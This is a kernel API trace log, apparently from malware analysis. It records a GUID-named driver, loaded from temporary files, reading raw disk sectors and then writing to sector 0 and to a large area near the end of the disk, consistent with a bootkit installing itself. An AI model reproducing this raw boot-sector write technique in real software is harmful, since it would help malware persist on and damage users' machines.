    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A0E 1.tmp: nt!IoBuildDeviceIoControlRequest
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A1C 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A63E70 [IRP_MJ_DEVICE_CONTROL ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BB5 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_DEVICE_CONTROL \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000000000000000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB90000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    ...
    ...
    ...
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9DE00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9E000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9E200 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9E400 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9E600 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9E800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B66 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD29E0 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A0E 3.tmp: nt!IoBuildDeviceIoControlRequest
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A1C 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_DEVICE_CONTROL ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BB5 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_DEVICE_CONTROL \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000000000000000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9EA00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 000000007FB90000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A5D298 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9EC00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 000000007FB90200 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FB9EE00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A5D298 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 000000007FB90400 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    ...
    ...
    ...
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 000000007FBDB600 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FBE3400 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 000000007FBDB800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 000000007FBE3600 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 000000007FBDBA00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    ...
    ...
    ...
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 000000007FBE3800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 000000007FBE3A00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007A00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007C00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x818D9000, 232448, 000000007FB90000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007A00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007C00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000000000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
